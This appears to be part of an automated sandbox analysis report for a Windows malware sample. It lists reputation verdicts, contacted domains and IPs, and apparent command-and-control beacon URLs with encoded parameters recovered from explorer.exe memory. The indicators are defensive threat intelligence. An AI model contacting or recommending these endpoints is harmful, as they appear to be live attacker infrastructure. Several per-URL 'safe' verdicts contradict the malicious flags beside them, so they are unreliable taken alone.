http://www.greate-electronics.com/lm31/www.antoni-tapies.com	0%	Avira URL Cloud	safe
http://www.greate-electronics.com/lm31/	0%	Avira URL Cloud	safe
http://www.delkhah-shop.com/lm31/	0%	Avira URL Cloud	safe
http://www.delkhah-shop.com	0%	Avira URL Cloud	safe
https://powerpoint.office.com	0%	Avira URL Cloud	safe
http://www.greate-electronics.com	0%	Avira URL Cloud	safe
http://www.foreca.com	0%	Avira URL Cloud	safe
http://www.rtpgacordewa288.com/lm31/	0%	Avira URL Cloud	safe
http://www.hbvc.xyz/lm31/www.sweatxin.com	0%	Avira URL Cloud	safe
http://www.ladonbet.xyz	100%	Avira URL Cloud	malware
http://www.malarosa.comReferer:	0%	Avira URL Cloud	safe
http://www.ladonbet.xyz/lm31/	100%	Avira URL Cloud	malware
http://www.webxwhiz.com/lm31/	0%	Avira URL Cloud	safe
http://www.k5h2o.top/lm31/www.rtpgacordewa288.com	0%	Avira URL Cloud	safe
http://www.warpateam.comReferer:	0%	Avira URL Cloud	safe
http://www.greate-electronics.comReferer:	0%	Avira URL Cloud	safe
http://www.kovacsking.shop/lm31/www.delkhah-shop.com	0%	Avira URL Cloud	safe
http://www.sweatxin.com	0%	Avira URL Cloud	safe
http://www.warpateam.com	0%	Avira URL Cloud	safe
http://www.warpateam.com/lm31/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.warpateam.com	103.224.212.213	true	true	unknown
y1.0pt8q-ic.ty3w.net	47.242.64.82	true	true	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	unknown
webxwhiz.com	162.0.209.131	true	true	unknown
antoni-tapies.com	164.90.157.77	true	true	unknown
shops.myshopify.com	23.227.38.74	true	true	unknown
www.kovacsking.shop	unknown	unknown	true	unknown
www.antoni-tapies.com	unknown	unknown	true	unknown
www.09gmpvp51.com	unknown	unknown	true	unknown
www.ladonbet.xyz	unknown	unknown	true	unknown
www.greate-electronics.com	unknown	unknown	true	unknown
www.sweatxin.com	unknown	unknown	true	unknown
www.17eclbet.com	unknown	unknown	true	unknown
www.webxwhiz.com	unknown	unknown	true	unknown
www.loki360store.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.antoni-tapies.com/lm31/?IR-4WR=QbCUt2+YIZlz+dwxAAtvOjK27in0zgvhNSRWcpAaxjKea8/898cVmCp5yUX+CKoU4c8tg+UM8w==&vN=I0D4IvR	true	Avira URL Cloud: safe	unknown
http://www.webxwhiz.com/lm31/?IR-4WR=ouOH1iLlZSoKQO8ZGquF9b4n2bh5CptaW8ZUOykV+DLPuA7sqI/QypE0IRpCwT+0rd/MZIKfKw==&vN=I0D4IvR	true	Avira URL Cloud: safe	unknown
http://www.loki360store.com/lm31/?vN=I0D4IvR&IR-4WR=3v9Mk5D4UG1ohOatnU60InV+BzHoz0n3lpHv5U7ut2amd93313AWpc+Mp9wa3RzchSXkA2ty2w==	true	Avira URL Cloud: safe	unknown
www.ladonbet.xyz/lm31/	true	Avira URL Cloud: malware	unknown
http://www.warpateam.com/lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR	true	Avira URL Cloud: safe	unknown
http://www.greate-electronics.com/lm31/?vN=I0D4IvR&IR-4WR=FoA+CglQbpkHnr+s7aBTRxGJK1Wdi0lwi/HX1clno50Ms2pZyKjp81NiBNziFvW0ERkZpCilTw==	true	Avira URL Cloud: safe	unknown
http://www.17eclbet.com/lm31/?vN=I0D4IvR&IR-4WR=FBWSmpNgcXV4Z7KuJkJmdDxUaYIsSjlTtHPGPH3H6ne0varfGF0HjaluKEQFNPCXvpsJxm6uZg==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ladonbet.xyz/lm31/www.09gmpvp51.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000003.00000000.1265667852.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3733334301.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.webxwhiz.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loki360store.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.antoni-tapies.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.antoni-tapies.com/lm31/www.hbvc.xyz	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.09gmpvp51.com/lm31/www.greate-electronics.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kovacsking.shop	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.delkhah-shop.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kovacsking.shopReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.09gmpvp51.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loki360store.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000003.00000003.3074286541.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3736459316.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271623577.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.malarosa.com/lm31/www.k5h2o.top	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loki360store.com/lm31/www.warpateam.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sweatxin.com/lm31/www.17eclbet.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.1272534932.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272383474.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272251892.000000000C403000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.09gmpvp51.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hbvc.xyzReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.k5h2o.top	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.malarosa.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.k5h2o.topReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	explorer.exe, 00000003.00000002.3741355604.000000001154F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000A.00000002.3732186608.0000000005CBF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.antoni-tapies.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ladonbet.xyzReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.17eclbet.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000003.2271623577.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.000000000913F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hbvc.xyz/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000003.00000002.3736285143.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.rtpgacordewa288.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loki360store.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000003.00000003.2272651654.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3735824051.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076210055.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.delkhah-shop.com/lm31/www.dr-shahmoradi.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.antoni-tapies.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.webxwhiz.com/lm31/www.kovacsking.shop	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.pollensense.com/	explorer.exe, 00000003.00000002.3733334301.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.17eclbet.com/lm31/www.webxwhiz.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dr-shahmoradi.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000003.00000002.3734565335.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740167000.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073650707.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267898832.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3735244831.0000000008820000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
